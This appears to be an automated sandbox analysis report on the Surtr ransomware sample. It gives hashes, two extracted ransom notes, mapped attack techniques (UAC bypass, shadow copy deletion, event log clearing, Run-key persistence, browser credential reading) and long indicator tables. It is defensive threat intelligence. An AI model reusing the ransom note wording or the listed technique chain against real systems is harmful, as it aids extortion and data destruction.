7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b

Analysis

max time kernel
143s
max time network
149s
platform
windows10_x64
resource
win10-en-20211208
submitted
01-01-2022 20:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
Size

1.2MB
MD5

09d73a4f9a9b1f31e90978e5f32f97cd
SHA1

6482d6d44f2ec6a9477d365a7d547ae86724da5f
SHA256

7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b
SHA512

f3afb2ce031d58063a66642dc07c535e35f3ead6c6c88b5104177a37d15082d7680a18e0a1ee349f7b2bdcaa0ac36f5e2d07ff49b6696e21039e5338d73d7147

Score

10^/10

evasion persistence ransomware spyware stealer trojan upx

Malware Config

Extracted

Path

C:\ProgramData\Service\SURTR_README.txt

Ransom Note

What happened to your files? Unfortunately, your server was compromised, using a security hole in your server. All your files are encrypted with a military algorithm . in order to contact us you can email this address [email protected] use this ID( jGUfErCxJWb1te ) for the title of your email. if you weren't able to contact us within 24 hours please email : [email protected] Only we can decrypt your files. Please do not contact separate fraudulent sites. You can use freeand even paid software on the Internet, but it is uselessand will cause you to lose filesand timeand money.

Emails

[email protected]

Extracted

Path

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta

Ransom Note

SurtrRansomware OOPS ALL YOUR IMPORTANT FILES HAVE BEEN ENCRYPTED AND STOLEN !! Notice : There is only one way to restore your data read the boxes carefully! Attention : Do Not change file names. Do Not try to decrypt using third party softwares , it may cause permanent data loss . If you do not pay the fee within one month , your important files will be published in our public belog . Do not pay any money before decrypting the test files. You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled. In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation . How To Decrypt : Your system is offline . in order to contact us you can email this address [email protected] use this ID (jGUfErCxJWb1te) for the title of your email . If you weren't able to contact us within 24 hours please email : [email protected] If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible

Emails

[email protected]

Signatures

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
3596	bcdedit.exe
4432	bcdedit.exe

Blocklisted process makes network request 5 IoCs

flow	pid	Process
26	3276	Process not Found
27	3276	Process not Found
30	3276	Process not Found
31	3276	Process not Found
34	3276	Process not Found

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000600000001ab35-181.dat	upx
behavioral2/files/0x000500000001ab42-190.dat	upx
behavioral2/files/0x000500000001ab48-191.dat	upx
behavioral2/files/0x000700000001ab4b-192.dat	upx

Drops startup file 7 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	Process not Found
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	wevtutil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe"	wevtutil.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe

Enumerates connected drives 3 TTPs 49 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\X:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\R:	vssadmin.exe
File opened (read-only)	\??\I:	vssadmin.exe
File opened (read-only)	\??\E:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\G:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\N:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\O:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\R:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\O:	vssadmin.exe
File opened (read-only)	\??\H:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\K:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\S:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\U:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\Q:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\X:	vssadmin.exe
File opened (read-only)	\??\K:	vssadmin.exe
File opened (read-only)	\??\Y:	vssadmin.exe
File opened (read-only)	\??\A:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\F:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\W:	vssadmin.exe
File opened (read-only)	\??\I:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\W:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\Z:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\P:	vssadmin.exe
File opened (read-only)	\??\V:	vssadmin.exe
File opened (read-only)	\??\N:	vssadmin.exe
File opened (read-only)	\??\L:	vssadmin.exe
File opened (read-only)	\??\B:	vssadmin.exe
File opened (read-only)	\??\P:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\Y:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\L:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\T:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\V:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\T:	vssadmin.exe
File opened (read-only)	\??\U:	vssadmin.exe
File opened (read-only)	\??\Q:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\S:	vssadmin.exe
File opened (read-only)	\??\Z:	vssadmin.exe
File opened (read-only)	\??\B:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\J:	vssadmin.exe
File opened (read-only)	\??\M:	vssadmin.exe
File opened (read-only)	\??\J:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\M:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened (read-only)	\??\A:	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\Service\\SurtrBackGround.jpg"	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365EduCloudEDUR_Grace-ppd.xrm-ms.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\Office.Runtime.js.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\PREVIEW.GIF.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_zh_CN.jar.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup-impl.xml.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hr-hr\ui-strings.js.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.kk-kz.dll.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\new_icons_retina.png.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\rhp_world_icon.png.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\adobe_sign_tag_retina.png.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fa.txt.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.SF.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelGlyph.16.White.png.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\video_filter\liboldmovie_plugin.dll.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\root\ui-strings.js.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\ext\nashorn.jar.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_SubTrial-ppd.xrm-ms.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CAPSULES\CAPSULES.INF.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pt-br_get.svg.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File created	C:\Program Files\Mozilla Firefox\Private_DATA.surt	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\ui-strings.js.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Garden.jpg.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_fil.dll.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\7-Zip\Lang\bn.txt.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cy.txt.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\micaut.dll.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Spatial.NetFX35.dll.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\selector.js.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_close_h.png.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\psfontj2d.properties.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-views.xml.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\zlibwapi.dll.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\demux\libty_plugin.dll.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\officeinventoryagentfallback.xml.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-ui.jar.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp4-pl.xrm-ms.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessR_Retail-ppd.xrm-ms.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kab.txt.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\Welcome.html.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial1-pl.xrm-ms.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nl-nl\ui-strings.js.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-180.png.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\System\mfcm140u.dll.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-gb\ui-strings.js.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\css\main.css.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\sRGB.pf.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\jce.jar.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Retail-pl.xrm-ms.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_OEM_Perp-ppd.xrm-ms.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_ja.jar.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\codec\libfaad_plugin.dll.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Test\Modules\Example2.Diagnostics\1.0.1\Example2.Diagnostics.psd1.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_KMS_Client_AE-ul.xrm-ms.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nb-no\ui-strings.js.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\jconsole.jar.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-nodes_ja.jar.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-charts.xml.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.office32ww.msi.16.x-none.xml.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\plugin.jar.[[email protected]].SURT	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3216	Process not Found
4752	schtasks.exe
1196	schtasks.exe

Interacts with shadow copies 2 TTPs 27 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1280	vssadmin.exe
1616	vssadmin.exe
2860	vssadmin.exe
1200	vssadmin.exe
5024	vssadmin.exe
4784	vssadmin.exe
1328	vssadmin.exe
680	vssadmin.exe
4072	vssadmin.exe
604	vssadmin.exe
4932	vssadmin.exe
4744	vssadmin.exe
2520	vssadmin.exe
5012	vssadmin.exe
1628	vssadmin.exe
5064	vssadmin.exe
1080	vssadmin.exe
1208	vssadmin.exe
892	vssadmin.exe
4828	vssadmin.exe
500	vssadmin.exe
4656	vssadmin.exe
2300	vssadmin.exe
4840	vssadmin.exe
5060	vssadmin.exe
3008	vssadmin.exe
1324	vssadmin.exe

Modifies registry class 6 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.surt	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.surt\ = "surt_auto_file"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file\DefaultIcon	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file\DefaultIcon\ = "C:\\ProgramData\\Service\\SurtrIcon.ico"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings	Process not Found

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
4220	Process not Found

Runs net.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeBackupPrivilege	3716	vssvc.exe
Token: SeRestorePrivilege	3716	vssvc.exe
Token: SeAuditPrivilege	3716	vssvc.exe
Token: SeSecurityPrivilege	356	wevtutil.exe
Token: SeBackupPrivilege	356	wevtutil.exe
Token: SeSecurityPrivilege	980	wevtutil.exe
Token: SeBackupPrivilege	980	wevtutil.exe
Token: SeSecurityPrivilege	1864	net.exe
Token: SeBackupPrivilege	1864	net.exe
Token: SeSecurityPrivilege	2380	wevtutil.exe
Token: SeBackupPrivilege	2380	wevtutil.exe
Token: SeSecurityPrivilege	2532	wevtutil.exe
Token: SeBackupPrivilege	2532	wevtutil.exe
Token: SeSecurityPrivilege	2856	wevtutil.exe
Token: SeBackupPrivilege	2856	wevtutil.exe
Token: SeSecurityPrivilege	2388	net.exe
Token: SeBackupPrivilege	2388	net.exe
Token: SeSecurityPrivilege	1668	wevtutil.exe
Token: SeBackupPrivilege	1668	wevtutil.exe
